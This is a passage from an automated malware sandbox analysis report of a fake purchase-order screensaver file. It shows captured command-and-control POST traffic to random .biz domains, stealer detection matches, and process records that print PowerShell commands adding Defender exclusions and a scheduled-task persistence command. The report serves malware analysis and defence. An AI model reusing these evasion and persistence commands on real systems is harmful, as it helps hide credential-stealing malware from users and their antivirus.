                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.258728027 CET850OUTData Raw: c7 3f 3b 8c 7e ea 12 c2 46 03 00 00 e6 7d b4 41 3f 2d 95 d0 ae b6 d7 85 ff 55 0d 10 94 1d d7 9b b0 c2 19 3e f6 d6 3b 5c 4c 00 25 a0 40 cf 28 a0 78 4a 2a 39 70 1c 1f 40 2f 90 04 3b a3 4c 42 1f 61 09 a2 4f 8a e8 2a 11 56 7a 87 e2 c4 bd 54 61 c0 00
                                                                                                                                                                                                                                                                        Data Ascii: ?;~F}A?-U>;\L%@(xJ*9p@/;LBaO*VzTa(}spDm]3GQk0PiU6]+m\+bU>a~Tw?9{8^rlci.Depg=V"`rSGBUD}Tu$
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.714334965 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:59 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=dfc4728a8871826f009980221834205c|8.46.123.189|1736942339|1736942339|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        47192.168.2.2249215165.160.13.20803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.741719961 CET342OUTPOST /d HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.741744995 CET850OUTData Raw: f0 78 e6 41 31 8c 64 d0 46 03 00 00 d1 45 7c b9 ff 53 b3 28 87 2f dc d1 9d cd 82 1b 33 d0 01 4e f9 c6 68 5b f6 38 1f 06 eb f7 6e b2 12 85 15 f7 42 1a 19 46 87 08 45 c8 1c 50 5d 1c 13 2b 38 88 3c 2d d2 d4 bc ef 18 8a 49 fe f9 ea e3 7b 34 f0 cf 9d
                                                                                                                                                                                                                                                                        Data Ascii: xA1dFE|S(/3Nh[8nBFEP]+8<-I{42 mqLuPv;*ZXYApW:_</<=%?h`Nf/w9F;#X"6pU`*4F_bqJgfFha
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.419083118 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:59:00 GMT
                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.514822006 CET346OUTPOST /cufth HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.514852047 CET850OUTData Raw: e4 85 cb 29 69 ce a4 c6 46 03 00 00 10 84 9c 40 ff d0 a5 1d ee 09 e4 ea ac 61 2e 8b 21 84 01 a9 6d 1b a2 f7 fa 81 c2 70 54 9d e0 e3 6b 30 a8 b0 c8 97 1f 2f 20 1d b3 e9 94 54 a9 97 cd 79 fd 9d b0 10 22 f1 02 d0 e0 ae a9 f8 1b 02 6d 05 6f ad c1 4a
                                                                                                                                                                                                                                                                        Data Ascii: )iF@a.!mpTk0/ Ty"moJQ4l>o:x&:mvOr<n)ok%[;i5>i^X]*Z'4QBl>2DiRb|Ed=myM$V@IoN
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.725339890 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:59:00 GMT
                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.948759079 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:59:00 GMT
                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        48192.168.2.224921654.244.188.177803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.775101900 CET351OUTPOST /nqxton HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.775135994 CET850OUTData Raw: 45 cc 01 73 9b 95 83 96 46 03 00 00 63 95 21 76 fb 9d f8 a4 90 bd f5 a3 35 ee 75 29 17 f4 62 8e e5 70 71 e6 66 a6 6c 50 a8 d2 b0 2d f5 4c c1 ec 5b d6 f6 aa e9 b2 29 0d 32 2d 01 27 c7 8e f8 18 42 d0 c0 9f f7 4b 60 33 e1 ad 20 85 4c a2 a5 86 a6 d8
                                                                                                                                                                                                                                                                        Data Ascii: EsFc!v5u)bpqflP-L[)2-'BK`3 Lcg9le u9Did"lx5" a+M<{0G}_^4``@%im'h5TOou@s.)vwFL&RN'2qerqO8Yx
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.508352995 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:59:01 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=3469880699a094ed6bd826c9788559e5|8.46.123.189|1736942341|1736942341|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        49192.168.2.224921718.246.231.120803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.063853979 CET351OUTPOST /njuvyxgvhb HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: jpskm.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.063890934 CET850OUTData Raw: 99 d4 dc 05 7b 3b c5 36 46 03 00 00 86 65 3b 49 29 3e 11 0b 42 0b 9d 1e 59 ac 43 13 a4 cb f4 f6 ff c9 eb 1a 97 3c f6 db e1 21 cd 98 a0 a6 65 87 1e a6 07 3c c2 23 d2 6e c3 4a 2d 48 a1 b3 f3 74 85 cd 03 a1 6f 6e 79 6f b4 82 67 f9 26 92 f3 9a 01 65
                                                                                                                                                                                                                                                                        Data Ascii: {;6Fe;I)>BYC<!e<#nJ-Htonyog&e=3OJ!|?Y y0Sgqwvo}[^!%:C$9$S!,WA{FUsZ?MBts,=OYHS5EawZ@RyvX@2!sK";Yg]>!u
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.782277107 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:59:02 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=15c177ec30e41e5a6aed326d471a059c|8.46.123.189|1736942342|1736942342|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        50192.168.2.224921854.244.188.177803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.804809093 CET352OUTPOST /rmrhacpx HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.804934978 CET850OUTData Raw: 27 51 85 03 ab fc 1e a5 46 03 00 00 26 72 c9 9a e4 e1 da f1 01 81 52 22 72 94 65 e5 08 10 63 1c ba e2 15 fb 00 f9 d9 6b bb cf 35 7d fe d0 60 04 df 77 ea 03 2f fc 9c 1b 8f 7d 36 00 27 88 15 37 11 19 dd 14 98 7f 1a 70 56 b2 43 12 b9 5b cd a7 4a 06
                                                                                                                                                                                                                                                                        Data Ascii: 'QF&rR"reck5}`w/}6'7pVC[Jm&I{fX.>x<iF[An_:LD'TK0Mpb,.$_AG+%.)B|Ai*lOVe30 G7LKeNu4$_v\x}c+


                                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        0192.168.2.2249168104.21.80.14433800C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2025-01-15 11:57:11 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        2025-01-15 11:57:12 UTC861INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:12 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Age: 2257021
                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Awnvj%2Fiz%2FOeo4cR5b9wL1zmSQgAmNwIImSO4fhnuu0K2bHpJwvPfQ0V9ATY2Vwjq1w3vlQRqkxw%2FqsGI%2BbIIXMFvczZQzGCB5EWTjjQSealWw%2ByxnOJ8%2BiSrEqp2qckLNUap6uVu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 9025afd6299d7d14-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2097&min_rtt=1956&rtt_var=1016&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=945289&cwnd=237&unsent_bytes=0&cid=d1fa8a1dc2ee04f7&ts=530&x=0"
                                                                                                                                                                                                                                                                        2025-01-15 11:57:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                        Start time:06:56:57
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\PO#_1100015533.scr
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\PO#_1100015533.scr" /S
                                                                                                                                                                                                                                                                        Imagebase:0xda0000
                                                                                                                                                                                                                                                                        File size:1'538'560 bytes
                                                                                                                                                                                                                                                                        MD5 hash:AC9D898648D7B851BBCCB6F6028D45C6
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                                        Start time:06:57:00
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr"
                                                                                                                                                                                                                                                                        Imagebase:0x3b0000
                                                                                                                                                                                                                                                                        File size:427'008 bytes
                                                                                                                                                                                                                                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                                        Start time:06:57:01
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x3b0000
                                                                                                                                                                                                                                                                        File size:427'008 bytes
                                                                                                                                                                                                                                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                                        Start time:06:57:01
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp"
                                                                                                                                                                                                                                                                        Imagebase:0x610000
                                                                                                                                                                                                                                                                        File size:179'712 bytes
                                                                                                                                                                                                                                                                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                                        Start time:06:57:03
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\PO#_1100015533.scr
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\PO#_1100015533.scr"
                                                                                                                                                                                                                                                                        Imagebase:0xda0000
                                                                                                                                                                                                                                                                        File size:1'538'560 bytes
                                                                                                                                                                                                                                                                        MD5 hash:AC9D898648D7B851BBCCB6F6028D45C6
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.393446054.0000000002950000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.380427536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.393694590.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.394485732.0000000003FA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.393542161.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                        Start time:06:57:04
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\taskeng.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:taskeng.exe {B8732EC0-088E-49BD-8386-4378D1DF7E0C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                                                                                                                                                                                                                                        Imagebase:0xff6a0000
                                                                                                                                                                                                                                                                        File size:464'384 bytes
                                                                                                                                                                                                                                                                        MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                        Start time:06:57:04
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        Imagebase:0x230000
                                                                                                                                                                                                                                                                        File size:1'538'560 bytes
                                                                                                                                                                                                                                                                        MD5 hash:AC9D898648D7B851BBCCB6F6028D45C6
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                        • Detection: 21%, ReversingLabs
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                        Start time:06:57:05
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:1'290'240 bytes
                                                                                                                                                                                                                                                                        MD5 hash:096F8412E89BED51F0B5E63CFDD50EDA
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                                        Start time:06:57:05
